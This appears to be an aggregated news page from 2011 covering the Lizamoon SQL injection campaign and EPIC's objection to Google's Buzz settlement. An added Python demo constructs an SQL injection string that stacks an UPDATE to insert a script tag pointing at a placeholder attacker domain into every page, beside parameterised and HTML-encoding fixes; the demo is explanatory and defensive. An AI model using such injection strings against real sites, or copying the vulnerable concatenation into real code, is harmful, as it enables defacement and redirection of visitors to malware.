Friday, April 1, 2011

Sites hit in massive web attack

Hundreds of thousands of websites appear to have been compromised by a massive cyber attack.

The hi-tech criminals used a well-known attack technique, SQL injection, that exploits flaws in other sites' web applications to insert a link to their own website.

Those visiting the criminals' webpage were told that their machines were infected with many different viruses.

Swift action by security researchers has managed to get the sites offering the sham software shut down.

Code control

Security firm Websense has been tracking the attack since it started on 29 March. The initial count of compromised sites was 28,000 sites but this has grown to encompass many times this number as the attack has rolled on.

Websense dubbed it the Lizamoon attack because that was the name of the first domain to which victims were re-directed. The fake software is called the Windows Stability Center.

The re-directions were carried out by what is known as an SQL injection attack. This succeeded because many web applications paste the text sent to them by visitors, such as the value of a parameter in a web address, straight into the database queries they run, without validating it or passing it to the database separately as data.

By formatting that text correctly it is possible to smuggle an extra instruction into it, which the database then executes alongside the query the site intended. In this case the injected instruction rewrote stored page content so that a script tag pointing at a particular domain appeared in the webpages served up to visitors, sending their browsers to that domain.

Reports suggest that the attackers are hitting sites using Microsoft SQL Server 2003 and 2005. The weakness, however, lies not in the database product itself but in the associated web software that builds queries from unfiltered visitor input.

Ongoing analysis of the attack reveals that the attackers managed to inject code to display links to 21 separate domains. The exact number of sites hit by the attack is hard to judge, but a Google search for the attackers' domains returns more than three million web pages that are displaying them.

Currently the re-directs are not working because the sites peddling the bogus software have been shut down.

Also hit were some web links connected with Apple's iTunes service. However, wrote Websense security researcher Patrick Runald on the firm's blog, this did not mean people were being redirected to the bogus software sites.

"The good thing is that iTunes encodes the script tags, which means that the script doesn't execute on the user's computer," he wrote.
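The two points the article makes, that the injection works because visitor text is pasted into SQL, and that iTunes was unaffected because it encodes script tags before rendering them, can be demonstrated together. The following is an added example written for this page, not code from Websense or from any attacked site; the table, column and function names and the attacker domain are placeholders, and SQLite stands in for the SQL Server databases the report describes.

```python
import html
import sqlite3

# Constructed, hypothetical names: none of this comes from the original
# report.  ATTACKER_DOMAIN is a placeholder, not one of the 21 real domains.
ATTACKER_DOMAIN = "attacker.example"
PAYLOAD_TAG = '<script src="http://%s/x.js"></script>' % ATTACKER_DOMAIN


def make_db():
    """Tiny in-memory site: page text in `pages`, a visit log in `visits`."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE visits (id INTEGER PRIMARY KEY, page TEXT);
        INSERT INTO pages (title, body) VALUES ('Home', 'Welcome');
        INSERT INTO pages (title, body) VALUES ('About', 'Contact us');
    """)
    return db


def log_visit_vulnerable(db, page):
    """The flaw the article describes: request text concatenated into SQL.

    sqlite3's execute() refuses a string holding more than one statement,
    so executescript() stands in for a driver that runs every statement it
    is handed, which is what lets a stacked UPDATE ride in on an INSERT.
    """
    sql = "INSERT INTO visits (page) VALUES ('" + page + "')"
    db.executescript(sql)


def log_visit_safe(db, page):
    """Parameterised query: `page` travels to the database as data, never as SQL."""
    db.execute("INSERT INTO visits (page) VALUES (?)", (page,))
    db.commit()


def attack_input():
    """Closes the string literal, appends an UPDATE that tags every page
    body with the script tag, then comments out the site's trailing quote."""
    return "x'); UPDATE pages SET body = body || '" + PAYLOAD_TAG + "'; --"


def page_bodies(db):
    return [row[0] for row in db.execute("SELECT body FROM pages ORDER BY id")]


def render_unsafe(body):
    """Raw interpolation: an injected tag becomes live script in the browser."""
    return "<div>" + body + "</div>"


def render_encoded(body):
    """What the article credits iTunes with: encode < > " so the tag is inert text."""
    return "<div>" + html.escape(body, quote=True) + "</div>"


def demo():
    vuln = make_db()
    log_visit_vulnerable(vuln, attack_input())   # every page body now carries the tag
    safe = make_db()
    log_visit_safe(safe, attack_input())         # payload stored as a harmless string
    tainted = page_bodies(vuln)[0]
    return {
        "vulnerable_bodies": page_bodies(vuln),
        "safe_bodies": page_bodies(safe),
        "unsafe_html": render_unsafe(tainted),
        "encoded_html": render_encoded(tainted),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The vulnerable path tags every page in one request, which is why a single injection could alter a whole site; the parameterised path stores the attacker's text as a page name and nothing else. The last two lines of the result show the second defence: even once the database has been tainted, encoding the stored text on output leaves the tag visible as text rather than executed as script.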



Powered By WizardRSS.com | Full Text Feeds | Amazon PluginsHud-1

Privacy group wants Google cash

A leading US privacy group has filed an objection to agreements Google has reached over its social network Buzz.

The Buzz experiment was heavily criticised because it automatically enrolled all Gmail users without seeking prior permission.

Legal action was taken by a group of Gmail users, with Google agreeing to set up an $8.5m (£5.2m) privacy fund.

The Electronic Privacy Information Center (EPIC) is unhappy that it is not one of the beneficiaries of the fund.

This is despite the fact that it filed the original complaint about the service with the Federal Trade Commission.

It has asked for $1.75m (£1.09m), claiming that it is a more independent group than some of those being given money.

It said that the majority of funds would be allocated to groups that "receive support from Google for lobbying, consulting or similar services".

It asked the court to reject a deal "that encourages organisations to stand by quietly while others do the actual work of safeguarding internet privacy".

It declined to say which groups provided lobbying services.

The American Civil Liberties Union, the Electronic Frontier Foundation and the Brookings Institution are among those who have received funds.

Moving on

Earlier this week, Google reached an agreement with the US Federal Trade Commission, following the conclusion of its investigation.

The FTC said that Google wrongly used information from Google Mail users to create Buzz.

Google has agreed to undergo a privacy review once every two years for the next 20 years.

In a statement after the FTC settlement, Google said it had "put this incident behind us".

"We are 100% focused on ensuring that our new privacy procedures effectively protect the interests of all our users," it said.

It declined to comment directly on the EPIC case.

Apologies

Buzz was launched as an application within Gmail in February 2010.

Like rival Facebook, it allowed users to post status updates, share content and read and comment on friends' posts.

But it also gave users a ready-made circle of friends based on the people they most frequently e-mailed.

This list could automatically be made public, which privacy experts said could be a huge problem for journalists, businesses or people having an illicit affair.

Following anger from users, Google made changes and apologised for insufficient testing of the service.
